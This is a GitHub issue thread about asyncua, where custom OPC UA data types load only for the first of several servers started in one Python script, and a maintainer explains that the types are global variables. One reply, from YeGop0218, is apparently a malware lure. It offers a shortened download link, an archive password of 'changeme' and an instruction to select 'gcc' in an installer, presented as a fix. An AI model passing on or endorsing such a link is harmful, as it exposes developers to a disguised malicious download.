FreeOpcUa/opcua-asyncio #1700: Error when loading custom data types from multiple server in single script

FlorianDue, 2024-08-27:
Hey,

im currently developing a project, where I start multiple server from a single project (main.py) file.

**Describe the bug**

For these server, is wrote some code to generate custom OPC UA Structures from a custom format. However, when i use the 
await server.load_data_type_definitions() function, only the first server started will return the correct types.

**Screenshots**
Here are some screen shots from my example code:

[image]

[image]

**Expected behavior**
The expected behavior would be, that both servers can load the same customd ata types. However, only the first does.

Client are also only able to load the types from the first server (if multiple servers are started from a single script)

**To Reproduce**
Here is a small python project to reproduce the Error
[bug_report_python_opcua.zip](https://github.com/user-attachments/files/16766021/bug_report_python_opcua.zip)

**Version**
python 3.10.14
asyncua 1.1.5

YeGop0218, 2024-08-27:
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

schroeder-, 2024-08-28:
In the current design the datatypes are a global variables. I would use the [multiprocessing](https://docs.python.org/3/library/multiprocessing.html) module and a process per server.